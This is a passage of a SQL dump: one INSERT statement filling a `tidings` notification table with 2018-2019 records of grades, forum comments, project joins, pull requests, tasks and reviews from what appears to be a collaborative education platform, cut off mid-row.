INSERT INTO `tidings` VALUES (1,1,0,1,'Grade',1,'Account',NULL,NULL,NULL,0,'2018-07-06 09:20:57','2018-07-06 09:20:57','System',NULL),(2,1,0,2,'Grade',1,'Phone',NULL,NULL,NULL,0,'2018-07-06 09:21:26','2018-07-06 09:21:26','System',NULL),(4,3,0,3,'Grade',3,'Phone',NULL,NULL,NULL,0,'2018-07-06 10:52:18','2018-07-06 10:52:18','System',NULL),(5,3,0,4,'Grade',3,'Account',NULL,NULL,NULL,0,'2018-07-06 10:52:50','2018-07-06 10:52:50','System',NULL),(6,1,1,2,'Memo',2,'Memo',1,'Forum',NULL,0,'2018-07-06 11:00:07','2018-07-06 11:00:07','Comment',NULL),(8,1,1,4,'Memo',4,'Memo',1,'Forum',NULL,0,'2018-07-06 11:03:07','2018-07-06 11:03:07','Comment',NULL),(25,1,1,21,'Memo',21,'Memo',2,'Forum',NULL,0,'2018-07-06 11:31:49','2018-07-06 11:31:49','Comment',NULL),(26,1,1,22,'Memo',22,'Memo',2,'Forum',NULL,0,'2018-07-06 11:33:05','2018-07-06 11:33:05','Comment',NULL),(27,1,1,1,'ApplyAction',NULL,'TrialAuthorization',NULL,'User',0,0,'2018-07-08 09:20:11','2018-07-08 09:20:11','Apply',NULL),(28,4,0,5,'Grade',4,'Phone',NULL,NULL,NULL,0,'2018-07-08 10:28:21','2018-07-08 10:28:21','System',NULL),(29,1,4,1,'ApplyAddDepartment',NULL,NULL,11,'School',1,NULL,'2018-07-08 10:29:41','2018-07-08 10:29:41','Apply',NULL),(30,1,4,2,'ApplyAddDepartment',NULL,NULL,11,'School',0,NULL,'2018-07-08 10:30:07','2018-07-08 10:30:07','Apply',NULL),(31,4,0,6,'Grade',4,'Account',NULL,NULL,NULL,0,'2018-07-08 10:30:44','2018-07-08 10:30:44','System',NULL),(32,1,1,1,'PraiseTread',21,'Memo',NULL,NULL,NULL,0,'2018-07-10 11:28:59','2018-07-10 11:28:59','Praise',NULL),(34,1,0,7,'Grade',1,'Avatar',NULL,NULL,NULL,0,'2018-07-10 16:42:15','2018-07-10 16:42:15','System',NULL),(43,1,1,10,'PraiseTread',2,'Memo',NULL,NULL,NULL,0,'2018-07-19 10:44:17','2018-07-19 10:44:17','Praise',NULL),(44,3,5,11,'ManagerJoinProject',NULL,NULL,11,'Project',NULL,NULL,'2018-07-20 11:14:39','2018-07-20 11:14:39','System','5'),(50,1,5,24,'Watcher',NULL,NULL,1,'User',NULL,0,'2018-08-02 22:54:11','2018-08-02 22:54:11','Fan',NULL),(53,6,1,13,'Journal',17,'Issue',18,'Project',NULL,0,'2018-08-03 16:48:17','2018-08-03 16:48:17','Comment',NULL),(59,1,9,1,'ApplyAddSchools',NULL,NULL,3159,'School',1,NULL,'2018-08-06 15:26:49','2018-08-06 15:26:49','Apply',NULL),(60,1,1,20,'PraiseTread',97,'Memo',NULL,NULL,NULL,0,'2018-08-07 16:28:17','2018-08-07 16:28:17','Praise',NULL),(61,5,1,30,'Journal',25,'Issue',13,'Project',NULL,0,'2018-08-10 09:18:52','2018-08-10 09:18:52','Comment',NULL),(63,1,5,21,'PraiseTread',123,'Memo',NULL,NULL,NULL,0,'2018-08-10 09:20:26','2018-08-10 09:20:26','Praise',NULL),(64,9,0,1,'ApplyAddSchools',NULL,NULL,3159,'School',1,NULL,'2018-08-10 09:29:14','2018-08-10 09:29:14','System',NULL),(65,4,0,1,'ApplyAddDepartment',NULL,NULL,11,'School',1,NULL,'2018-08-10 09:31:40','2018-08-10 09:31:40','System',NULL),(66,1,5,3,'ApplyAddDepartment',NULL,NULL,117,'School',0,NULL,'2018-08-10 09:35:22','2018-08-10 09:35:22','Apply',NULL),(68,1,1,31,'ManagerJoinProject',NULL,NULL,31,'Project',NULL,NULL,'2018-08-21 22:01:45','2018-08-21 22:01:45','System','3'),(69,NULL,1,37,'ManagerJoinProject',NULL,NULL,37,'Project',NULL,NULL,'2018-08-21 22:13:33','2018-08-21 22:13:33','System','3'),(70,11,1,37,'ManagerJoinProject',NULL,NULL,37,'Project',NULL,NULL,'2018-08-21 22:13:46','2018-08-21 22:13:46','System','3'),(71,1,10,23,'PraiseTread',143,'Memo',NULL,NULL,NULL,0,'2018-08-25 09:38:18','2018-08-25 09:38:18','Praise',NULL),(72,1,14,2,'ApplyAddSchools',NULL,NULL,3160,'School',0,NULL,'2018-09-05 13:58:54','2018-09-05 13:58:54','Apply',NULL),(73,1,15,3,'ApplyAddSchools',NULL,NULL,3161,'School',0,NULL,'2018-09-07 12:38:28','2018-09-07 12:38:28','Apply',NULL),(74,1,17,4,'ApplyAddSchools',NULL,NULL,3162,'School',0,NULL,'2018-10-12 17:40:22','2018-10-12 17:40:22','Apply',NULL),(75,1,9,24,'PraiseTread',160,'Memo',NULL,NULL,NULL,0,'2018-11-13 11:28:00','2018-11-13 11:28:00','Praise',NULL),(76,NULL,1,69,'ManagerJoinProject',NULL,NULL,69,'Project',NULL,NULL,'2018-11-22 20:45:03','2018-11-22 20:45:03','System','3'),(77,NULL,1,69,'ManagerJoinProject',NULL,NULL,69,'Project',NULL,NULL,'2018-11-22 21:49:24','2018-11-22 21:49:24','System','3'),(78,NULL,1,69,'ManagerJoinProject',NULL,NULL,69,'Project',NULL,NULL,'2018-11-22 21:49:29','2018-11-22 21:49:29','System','3'),(79,NULL,1,69,'ManagerJoinProject',NULL,NULL,69,'Project',NULL,NULL,'2018-11-22 21:49:36','2018-11-22 21:49:36','System','3'),(80,NULL,1,69,'ManagerJoinProject',NULL,NULL,69,'Project',NULL,NULL,'2018-11-22 21:49:43','2018-11-22 21:49:43','System','3'),(83,6,1,100,'ManagerJoinProject',NULL,NULL,100,'Project',NULL,NULL,'2019-01-22 00:40:06','2019-01-22 00:40:06','System','4'),(84,6,1,38,'Issue',NULL,NULL,100,'Project',NULL,0,'2019-01-22 00:40:32','2019-01-22 00:40:32','Project',NULL),(85,1,6,37,'Journal',38,'Issue',100,'Project',NULL,0,'2019-01-22 00:45:20','2019-01-22 00:45:20','Project',NULL),(86,1,6,38,'Journal',38,'Issue',100,'Project',NULL,0,'2019-01-22 00:46:41','2019-01-22 00:46:41','Project',NULL),(87,6,1,101,'ManagerJoinProject',NULL,NULL,101,'Project',NULL,NULL,'2019-01-22 09:10:32','2019-01-22 09:10:32','System','3'),(88,6,1,41,'Issue',NULL,NULL,101,'Project',NULL,0,'2019-01-22 09:14:03','2019-01-22 09:14:03','Project',NULL),(89,6,1,42,'Issue',NULL,NULL,101,'Project',NULL,0,'2019-01-22 09:19:47','2019-01-22 09:19:47','Project',NULL),(90,1,6,41,'Journal',41,'Issue',101,'Project',NULL,0,'2019-01-22 09:20:38','2019-01-22 09:20:38','Project',NULL),(91,21,0,2,'ApplyAction',NULL,'TrialAuthorization',NULL,'User',1,0,'2019-01-25 11:44:49','2019-01-25 11:44:49','System',NULL),(92,22,0,3,'ApplyAction',NULL,'TrialAuthorization',NULL,'User',1,0,'2019-01-25 11:44:49','2019-01-25 11:44:49','System',NULL),(93,23,0,4,'ApplyAction',NULL,'TrialAuthorization',NULL,'User',1,0,'2019-01-25 11:44:49','2019-01-25 11:44:49','System',NULL),(94,24,0,5,'ApplyAction',NULL,'TrialAuthorization',NULL,'User',1,0,'2019-01-25 11:44:49','2019-01-25 11:44:49','System',NULL),(95,25,0,6,'ApplyAction',NULL,'TrialAuthorization',NULL,'User',1,0,'2019-01-25 11:44:50','2019-01-25 11:44:50','System',NULL),(96,26,0,7,'ApplyAction',NULL,'TrialAuthorization',NULL,'User',1,0,'2019-01-25 11:44:50','2019-01-25 11:44:50','System',NULL),(97,27,0,8,'ApplyAction',NULL,'TrialAuthorization',NULL,'User',1,0,'2019-01-25 11:44:50','2019-01-25 11:44:50','System',NULL),(98,28,0,9,'ApplyAction',NULL,'TrialAuthorization',NULL,'User',1,0,'2019-01-25 11:44:50','2019-01-25 11:44:50','System',NULL),(99,29,0,10,'ApplyAction',NULL,'TrialAuthorization',NULL,'User',1,0,'2019-01-25 11:44:50','2019-01-25 11:44:50','System',NULL),(100,30,0,11,'ApplyAction',NULL,'TrialAuthorization',NULL,'User',1,0,'2019-01-25 11:44:50','2019-01-25 11:44:50','System',NULL),(101,31,0,12,'ApplyAction',NULL,'TrialAuthorization',NULL,'User',1,0,'2019-03-13 16:32:20','2019-03-13 16:32:20','System',NULL),(102,32,0,13,'ApplyAction',NULL,'TrialAuthorization',NULL,'User',1,0,'2019-03-13 16:32:20','2019-03-13 16:32:20','System',NULL),(103,33,0,14,'ApplyAction',NULL,'TrialAuthorization',NULL,'User',1,0,'2019-03-13 16:32:20','2019-03-13 16:32:20','System',NULL),(104,34,0,15,'ApplyAction',NULL,'TrialAuthorization',NULL,'User',1,0,'2019-03-13 16:32:20','2019-03-13 16:32:20','System',NULL),(105,35,0,16,'ApplyAction',NULL,'TrialAuthorization',NULL,'User',1,0,'2019-03-13 16:32:20','2019-03-13 16:32:20','System',NULL),(106,36,0,17,'ApplyAction',NULL,'TrialAuthorization',NULL,'User',1,0,'2019-03-13 16:32:20','2019-03-13 16:32:20','System',NULL),(107,37,0,18,'ApplyAction',NULL,'TrialAuthorization',NULL,'User',1,0,'2019-03-13 16:32:20','2019-03-13 16:32:20','System',NULL),(108,38,0,19,'ApplyAction',NULL,'TrialAuthorization',NULL,'User',1,0,'2019-03-13 16:32:21','2019-03-13 16:32:21','System',NULL),(109,39,0,20,'ApplyAction',NULL,'TrialAuthorization',NULL,'User',1,0,'2019-03-13 16:32:21','2019-03-13 16:32:21','System',NULL),(110,40,0,21,'ApplyAction',NULL,'TrialAuthorization',NULL,'User',1,0,'2019-03-13 16:32:21','2019-03-13 16:32:21','System',NULL),(111,26,43,130,'JoinProject',NULL,NULL,130,'Project',1,NULL,'2019-04-17 09:55:37','2019-04-17 09:55:37','Apply','4'),(112,26,42,130,'ReporterJoinProject',NULL,NULL,130,'Project',NULL,NULL,'2019-04-17 09:55:48','2019-04-17 09:55:48','System',NULL),(113,43,26,130,'DealProject',NULL,NULL,130,'Project',1,NULL,'2019-04-17 09:57:04','2019-04-17 09:57:04','System','4'),(114,43,26,46,'Journal',44,'Issue',130,'Project',NULL,0,'2019-04-17 14:02:47','2019-04-17 14:02:47','Comment',NULL),(118,26,51,62,'Journal',50,'Issue',130,'Project',NULL,0,'2019-08-07 15:03:10','2019-08-07 15:03:10','Comment',NULL),(121,20,49,134,'ManagerJoinProject',NULL,NULL,134,'Project',NULL,NULL,'2019-08-08 15:22:26','2019-08-08 15:22:26','System','5'),(122,NULL,49,134,'ManagerJoinProject',NULL,NULL,134,'Project',NULL,NULL,'2019-08-08 15:38:43','2019-08-08 15:38:43','System','5'),(123,50,49,134,'ManagerJoinProject',NULL,NULL,134,'Project',NULL,NULL,'2019-08-08 15:38:59','2019-08-08 15:38:59','System','5'),(127,1,50,54,'PraiseTread',183,'Memo',NULL,NULL,NULL,0,'2019-08-09 09:04:45','2019-08-09 09:04:45','Praise',NULL),(164,1,49,91,'PraiseTread',183,'Memo',NULL,NULL,NULL,0,'2019-08-10 10:44:39','2019-08-10 10:44:39','Praise',NULL),(165,50,49,27,'Watcher',NULL,NULL,50,'User',NULL,0,'2019-08-13 08:47:54','2019-08-13 08:47:54','Fan',NULL),(167,46,50,130,'ManagerJoinProject',NULL,NULL,130,'Project',NULL,NULL,'2019-08-13 17:13:59','2019-08-13 17:13:59','System','3'),(168,49,50,130,'ManagerJoinProject',NULL,NULL,130,'Project',NULL,NULL,'2019-08-13 17:19:25','2019-08-13 17:19:25','System','5'),(169,46,53,133,'JoinProject',NULL,NULL,133,'Project',1,NULL,'2019-08-14 08:09:43','2019-08-14 08:09:43','Apply','4'),(171,53,50,28,'Watcher',NULL,NULL,53,'User',NULL,0,'2019-08-14 10:11:03','2019-08-14 10:11:03','Fan',NULL),(172,26,46,63,'Journal',50,'Issue',130,'Project',NULL,0,'2019-08-14 14:35:38','2019-08-14 14:35:38','Comment',NULL),(175,50,50,95,'PraiseTread',230,'Memo',NULL,NULL,NULL,0,'2019-08-15 15:01:09','2019-08-15 15:01:09','Praise',NULL),(176,50,50,96,'PraiseTread',56,'Issue',NULL,NULL,NULL,0,'2019-08-23 15:09:41','2019-08-23 15:09:41','Praise',NULL),(177,NULL,50,152,'ManagerJoinProject',NULL,NULL,152,'Project',NULL,NULL,'2019-09-19 16:09:37','2019-09-19 16:09:37','System','4'),(178,52,50,152,'ManagerJoinProject',NULL,NULL,152,'Project',NULL,NULL,'2019-09-19 16:09:51','2019-09-19 16:09:51','System','4'),(179,50,49,152,'JoinProject',NULL,NULL,152,'Project',1,NULL,'2019-09-19 16:24:32','2019-09-19 16:24:32','Apply','4'),(180,49,50,152,'DealProject',NULL,NULL,152,'Project',1,NULL,'2019-09-19 16:24:42','2019-09-19 16:24:42','System','4'),(181,50,8,152,'JoinProject',NULL,NULL,152,'Project',0,NULL,'2019-09-20 09:32:33','2019-09-20 09:32:33','Apply','3'),(186,50,50,101,'PraiseTread',240,'Memo',NULL,NULL,NULL,0,'2019-09-30 09:52:13','2019-09-30 09:52:13','Praise',NULL),(187,50,49,102,'PraiseTread',236,'Memo',NULL,NULL,NULL,0,'2019-10-08 10:41:48','2019-10-08 10:41:48','Praise',NULL),(188,50,20,155,'JoinProject',NULL,NULL,155,'Project',1,NULL,'2019-10-08 10:43:23','2019-10-08 10:43:23','Apply','4'),(189,20,50,155,'DealProject',NULL,NULL,155,'Project',1,NULL,'2019-10-08 10:43:48','2019-10-08 10:43:48','System','4'),(190,50,20,59,'Issue',NULL,NULL,155,'Project',NULL,0,'2019-10-08 10:44:52','2019-10-08 10:44:52','Project',NULL),(191,49,20,161,'ManagerJoinProject',NULL,NULL,161,'Project',NULL,NULL,'2019-10-08 10:51:53','2019-10-08 10:51:53','System','4'),(192,49,20,60,'Issue',NULL,NULL,161,'Project',NULL,0,'2019-10-08 11:00:58','2019-10-08 11:00:58','Project',NULL),(193,20,50,159,'ManagerJoinProject',NULL,NULL,159,'Project',NULL,NULL,'2019-10-08 11:17:57','2019-10-08 11:17:57','System','4'),(194,46,49,163,'ManagerJoinProject',NULL,NULL,163,'Project',NULL,NULL,'2019-10-14 09:01:10','2019-10-14 09:01:10','System','5'),(195,50,50,1,'PullRequest',166,'Project',166,'Project',0,0,'2019-10-19 09:19:51','2019-10-19 09:19:51','Apply',NULL),(196,46,46,2,'PullRequest',164,'Project',164,'Project',1,0,'2019-10-21 09:04:25','2019-10-21 09:04:25','Apply',NULL),(197,46,46,3,'PullRequest',164,'Project',164,'Project',0,0,'2019-10-21 09:06:40','2019-10-21 09:06:40','Apply',NULL),(198,46,46,NULL,'PullRequest',164,'Project',164,'Project',0,0,'2019-10-21 09:06:42','2019-10-21 09:06:42','Apply',NULL),(199,46,46,NULL,'PullRequest',164,'Project',164,'Project',0,0,'2019-10-21 09:17:16','2019-10-21 09:17:16','Apply',NULL),(200,46,46,NULL,'PullRequest',164,'Project',164,'Project',0,0,'2019-10-21 09:17:18','2019-10-21 09:17:18','Apply',NULL),(201,46,46,NULL,'PullRequest',164,'Project',164,'Project',0,0,'2019-10-21 09:17:21','2019-10-21 09:17:21','Apply',NULL),(202,46,46,NULL,'PullRequest',164,'Project',164,'Project',0,0,'2019-10-21 09:17:23','2019-10-21 09:17:23','Apply',NULL),(203,46,46,4,'PullRequest',164,'Project',164,'Project',1,0,'2019-10-21 09:19:01','2019-10-21 09:19:01','Apply',NULL),(204,46,46,4,'PullRequest',164,'Project',164,'Project',2,0,'2019-10-21 09:30:11','2019-10-21 09:30:11','Project',NULL),(205,59,49,168,'JoinProject',NULL,NULL,168,'Project',1,NULL,'2019-10-23 09:37:25','2019-10-23 09:37:25','Apply','4'),(206,49,59,168,'DealProject',NULL,NULL,168,'Project',1,NULL,'2019-10-23 09:38:24','2019-10-23 09:38:24','System','4'),(207,59,49,5,'PullRequest',168,'Project',168,'Project',1,0,'2019-10-23 09:53:45','2019-10-23 09:53:45','Apply',NULL),(208,49,59,5,'PullRequest',168,'Project',168,'Project',2,0,'2019-10-23 09:54:05','2019-10-23 09:54:05','Project',NULL),(209,46,46,2,'PullRequest',164,'Project',164,'Project',4,0,'2019-10-23 13:52:20','2019-10-23 13:52:20','Project',NULL),(210,46,46,6,'PullRequest',164,'Project',164,'Project',1,0,'2019-10-23 14:15:17','2019-10-23 14:15:17','Apply',NULL),(211,46,46,6,'PullRequest',164,'Project',164,'Project',4,0,'2019-10-23 14:25:57','2019-10-23 14:25:57','Project',NULL),(212,46,46,7,'PullRequest',169,'Project',169,'Project',1,0,'2019-10-23 15:59:45','2019-10-23 15:59:45','Apply',NULL),(213,46,46,7,'PullRequest',169,'Project',169,'Project',2,0,'2019-10-23 16:00:42','2019-10-23 16:00:42','Project',NULL),(214,46,46,103,'PraiseTread',68,'Journal',NULL,NULL,NULL,0,'2019-10-23 16:15:41','2019-10-23 16:15:41','Praise',NULL),(215,46,49,169,'JoinProject',NULL,NULL,169,'Project',1,NULL,'2019-10-23 16:27:47','2019-10-23 16:27:47','Apply','4'),(216,49,46,169,'DealProject',NULL,NULL,169,'Project',1,NULL,'2019-10-23 16:37:05','2019-10-23 16:37:05','System','4'),(217,46,49,70,'Journal',62,'Issue',169,'Project',NULL,0,'2019-10-23 16:54:36','2019-10-23 16:54:36','Comment',NULL),(218,46,49,71,'Journal',62,'Issue',169,'Project',NULL,0,'2019-10-23 16:54:49','2019-10-23 16:54:49','Project',NULL),(219,46,49,8,'PullRequest',169,'Project',169,'Project',1,0,'2019-10-23 16:57:38','2019-10-23 16:57:38','Apply',NULL),(220,49,49,8,'PullRequest',169,'Project',169,'Project',4,0,'2019-10-23 16:58:21','2019-10-23 16:58:21','Project',NULL),(221,49,1,25,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-10-25 08:53:23','2019-10-25 08:53:23','Project','5'),(222,49,1,26,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-10-25 08:58:33','2019-10-25 08:58:33','Project','5'),(223,49,1,27,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-10-25 09:13:16','2019-10-25 09:13:16','Project','5'),(224,49,1,28,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-10-25 09:16:14','2019-10-25 09:16:14','Project','5'),(225,49,1,29,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-10-25 09:31:42','2019-10-25 09:31:42','Project','6'),(226,1,46,53,'Paper',NULL,NULL,25,'Task',1,0,'2019-10-25 10:08:28','2019-10-25 10:08:28','Comment','1'),(227,1,46,5,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-10-25 10:19:40','2019-10-25 10:19:40','Project','2'),(228,46,1,5,'Task',NULL,NULL,NULL,NULL,1,0,'2019-10-25 10:22:47','2019-10-25 10:22:47','System','8'),(229,46,1,3,'Task',NULL,NULL,NULL,NULL,1,0,'2019-10-25 10:40:25','2019-10-25 10:40:25','System','8'),(230,1,50,54,'Paper',NULL,NULL,25,'Task',1,0,'2019-10-25 14:42:30','2019-10-25 14:42:30','Comment','1'),(231,1,59,55,'Paper',NULL,NULL,25,'Task',1,0,'2019-10-25 14:43:07','2019-10-25 14:43:07','Comment','1'),(232,1,50,56,'Paper',NULL,NULL,26,'Task',1,0,'2019-10-25 14:43:45','2019-10-25 14:43:45','Comment','1'),(233,1,49,25,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-10-25 15:05:06','2019-10-25 15:05:06','Project','2'),(234,50,1,25,'Task',NULL,NULL,NULL,NULL,1,0,'2019-10-25 15:21:07','2019-10-25 15:21:07','System','11'),(235,1,49,20,'Review',NULL,NULL,NULL,NULL,1,0,'2019-10-25 15:21:07','2019-10-25 15:21:07','Review','16'),(236,49,1,20,'Review',NULL,NULL,NULL,NULL,1,0,'2019-10-25 15:21:40','2019-10-25 15:21:40','System','17'),(237,1,49,21,'Review',NULL,NULL,NULL,NULL,1,0,'2019-10-25 15:24:44','2019-10-25 15:24:44','Review','18'),(238,49,1,21,'Review',NULL,NULL,NULL,NULL,1,0,'2019-10-25 15:25:11','2019-10-25 15:25:11','System','19'),(239,1,59,57,'Paper',NULL,NULL,29,'Task',1,0,'2019-10-25 15:29:51','2019-10-25 15:29:51','Comment','1'),(240,1,50,58,'Paper',NULL,NULL,29,'Task',1,0,'2019-10-25 15:30:23','2019-10-25 15:30:23','Comment','1'),(241,1,46,59,'Paper',NULL,NULL,29,'Task',1,0,'2019-10-25 15:30:58','2019-10-25 15:30:58','Comment','1'),(242,1,49,29,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-10-25 15:33:42','2019-10-25 15:33:42','Project','2'),(243,49,1,29,'Task',NULL,NULL,NULL,NULL,1,0,'2019-10-25 15:38:44','2019-10-25 15:38:44','System','11'),(244,50,1,29,'Task',NULL,NULL,NULL,NULL,1,0,'2019-10-25 15:38:44','2019-10-25 15:38:44','System','11'),(245,46,1,29,'Task',NULL,NULL,NULL,NULL,1,0,'2019-10-25 15:38:44','2019-10-25 15:38:44','System','11'),(246,46,1,9,'Task',NULL,NULL,NULL,NULL,1,0,'2019-10-25 16:05:46','2019-10-25 16:05:46','System','10'),(247,50,1,26,'Paper',NULL,NULL,9,'Task',1,0,'2019-10-25 16:05:46','2019-10-25 16:05:46','System','12'),(248,49,1,29,'Paper',NULL,NULL,9,'Task',1,0,'2019-10-25 16:05:46','2019-10-25 16:05:46','System','12'),(249,49,1,29,'Task',NULL,NULL,NULL,NULL,1,0,'2019-10-25 16:08:12','2019-10-25 16:08:12','System','10'),(250,50,1,58,'Paper',NULL,NULL,29,'Task',1,0,'2019-10-25 16:08:12','2019-10-25 16:08:12','System','12'),(251,46,1,59,'Paper',NULL,NULL,29,'Task',1,0,'2019-10-25 16:08:12','2019-10-25 16:08:12','System','12'),(252,1,59,60,'Paper',NULL,NULL,26,'Task',1,0,'2019-10-25 16:12:56','2019-10-25 16:12:56','Comment','1'),(253,1,46,61,'Paper',NULL,NULL,26,'Task',1,0,'2019-10-25 16:17:12','2019-10-25 16:17:12','Comment','1'),(254,1,49,26,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-10-25 16:19:05','2019-10-25 16:19:05','Project','2'),(255,49,1,26,'Task',NULL,NULL,NULL,NULL,1,0,'2019-10-25 16:24:43','2019-10-25 16:24:43','System','11'),(256,50,1,26,'Task',NULL,NULL,NULL,NULL,1,0,'2019-10-25 16:24:43','2019-10-25 16:24:43','System','11'),(257,59,1,26,'Task',NULL,NULL,NULL,NULL,1,0,'2019-10-25 16:24:43','2019-10-25 16:24:43','System','11'),(258,49,1,26,'Task',NULL,NULL,NULL,NULL,1,0,'2019-10-25 16:26:32','2019-10-25 16:26:32','System','10'),(259,50,1,56,'Paper',NULL,NULL,26,'Task',1,0,'2019-10-25 16:26:32','2019-10-25 16:26:32','System','12'),(260,59,1,60,'Paper',NULL,NULL,26,'Task',1,0,'2019-10-25 16:26:32','2019-10-25 16:26:32','System','12'),(261,49,1,30,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-10-27 14:08:54','2019-10-27 14:08:54','Project','5'),(262,1,46,62,'Paper',NULL,NULL,30,'Task',1,0,'2019-10-27 14:12:07','2019-10-27 14:12:07','Comment','1'),(263,1,59,63,'Paper',NULL,NULL,30,'Task',1,0,'2019-10-27 14:12:10','2019-10-27 14:12:10','Comment','1'),(264,1,50,64,'Paper',NULL,NULL,30,'Task',1,0,'2019-10-27 14:16:02','2019-10-27 14:16:02','Comment','1'),(265,1,46,30,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-10-27 14:18:55','2019-10-27 14:18:55','Project','2'),(266,1,49,65,'Paper',NULL,NULL,30,'Task',1,0,'2019-10-27 14:20:59','2019-10-27 14:20:59','Comment','1'),(267,59,1,30,'Task',NULL,NULL,NULL,NULL,1,0,'2019-10-27 14:27:50','2019-10-27 14:27:50','System','11'),(268,1,49,25,'Review',NULL,NULL,NULL,NULL,1,0,'2019-10-27 14:27:50','2019-10-27 14:27:50','Review','16'),(269,49,1,25,'Review',NULL,NULL,NULL,NULL,1,0,'2019-10-27 14:29:40','2019-10-27 14:29:40','System','17'),(270,1,49,26,'Review',NULL,NULL,NULL,NULL,1,0,'2019-10-27 14:32:28','2019-10-27 14:32:28','Review','18'),(271,49,1,26,'Review',NULL,NULL,NULL,NULL,1,0,'2019-10-27 14:32:41','2019-10-27 14:32:41','System','19'),(272,49,1,31,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-10-27 14:41:43','2019-10-27 14:41:43','Project','5'),(273,1,49,31,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-10-27 14:46:55','2019-10-27 14:46:55','Project','2'),(274,49,1,31,'Task',NULL,NULL,NULL,NULL,1,0,'2019-10-27 14:51:46','2019-10-27 14:51:46','System','11'),(275,59,1,31,'Task',NULL,NULL,NULL,NULL,1,0,'2019-10-27 14:51:46','2019-10-27 14:51:46','System','11'),(276,50,1,31,'Task',NULL,NULL,NULL,NULL,1,0,'2019-10-27 14:51:46','2019-10-27 14:51:46','System','11'),(277,49,1,31,'Task',NULL,NULL,NULL,NULL,1,0,'2019-10-27 14:55:24','2019-10-27 14:55:24','System','10'),(278,59,1,66,'Paper',NULL,NULL,31,'Task',1,0,'2019-10-27 14:55:24','2019-10-27 14:55:24','System','12'),(279,50,1,68,'Paper',NULL,NULL,31,'Task',1,0,'2019-10-27 14:55:24','2019-10-27 14:55:24','System','12'),(280,49,1,32,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-10-27 15:00:19','2019-10-27 15:00:19','Project','6'),(281,1,49,32,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-10-27 15:07:00','2019-10-27 15:07:00','Project','2'),(282,49,1,32,'Task',NULL,NULL,NULL,NULL,1,0,'2019-10-27 15:15:14','2019-10-27 15:15:14','System','11'),(283,59,1,32,'Task',NULL,NULL,NULL,NULL,1,0,'2019-10-27 15:15:14','2019-10-27 15:15:14','System','11'),(284,50,1,32,'Task',NULL,NULL,NULL,NULL,1,0,'2019-10-27 15:15:14','2019-10-27 15:15:14','System','11'),(285,49,1,32,'Task',NULL,NULL,NULL,NULL,1,0,'2019-10-27 15:17:11','2019-10-27 15:17:11','System','10'),(286,59,1,70,'Paper',NULL,NULL,32,'Task',1,0,'2019-10-27 15:17:11','2019-10-27 15:17:11','System','12'),(287,50,1,71,'Paper',NULL,NULL,32,'Task',1,0,'2019-10-27 15:17:11','2019-10-27 15:17:11','System','12'),(288,49,1,33,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-10-28 10:21:21','2019-10-28 10:21:21','Project','5'),(289,1,59,72,'Paper',NULL,NULL,33,'Task',1,0,'2019-10-28 11:15:06','2019-10-28 11:15:06','Comment','1'),(290,1,46,73,'Paper',NULL,NULL,33,'Task',1,0,'2019-10-28 11:21:45','2019-10-28 11:21:45','Comment','1'),(291,1,49,33,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-10-28 11:26:49','2019-10-28 11:26:49','Project','2'),(292,1,49,33,'Task',NULL,NULL,NULL,NULL,1,0,'2019-10-28 11:32:42','2019-10-28 11:32:42','Task','21'),(293,59,1,33,'Task',NULL,NULL,NULL,NULL,1,0,'2019-10-28 11:33:00','2019-10-28 11:33:00','System','11'),(297,32,41,127,'JoinProject',NULL,NULL,127,'Project',1,NULL,'2019-10-28 15:09:08','2019-10-28 15:09:08','Apply','4'),(298,41,32,127,'DealProject',NULL,NULL,127,'Project',1,NULL,'2019-10-28 15:11:19','2019-10-28 15:11:19','System','4'),(300,59,1,34,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-10-29 08:36:25','2019-10-29 08:36:25','Project','5'),(301,59,1,35,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-10-29 08:51:00','2019-10-29 08:51:00','Project','5'),(302,1,49,74,'Paper',NULL,NULL,35,'Task',1,0,'2019-10-29 08:51:38','2019-10-29 08:51:38','Comment','1'),(303,1,50,75,'Paper',NULL,NULL,35,'Task',1,0,'2019-10-29 08:52:58','2019-10-29 08:52:58','Comment','1'),(304,1,59,35,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-10-29 08:59:27','2019-10-29 08:59:27','Project','2'),(305,1,59,35,'Task',NULL,NULL,NULL,NULL,1,0,'2019-10-29 09:06:35','2019-10-29 09:06:35','Task','21'),(306,49,1,35,'Task',NULL,NULL,NULL,NULL,1,0,'2019-10-29 09:06:47','2019-10-29 09:06:47','System','11'),(311,49,1,36,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-10-29 09:22:39','2019-10-29 09:22:39','Project','5'),(312,49,1,37,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-10-29 09:25:23','2019-10-29 09:25:23','Project','6'),(313,49,1,38,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-10-29 09:34:07','2019-10-29 09:34:07','Project','6'),(314,49,1,39,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-10-29 09:34:43','2019-10-29 09:34:43','Project','6'),(315,49,1,40,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-10-29 09:35:29','2019-10-29 09:35:29','Project','6'),(316,49,1,41,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-10-29 09:37:40','2019-10-29 09:37:40','Project','6'),(317,59,1,42,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-10-29 09:43:20','2019-10-29 09:43:20','Project','5'),(318,49,1,43,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-10-29 09:46:32','2019-10-29 09:46:32','Project','5'),(319,49,1,44,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-10-29 12:50:00','2019-10-29 12:50:00','Project','5'),(320,49,1,45,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-10-29 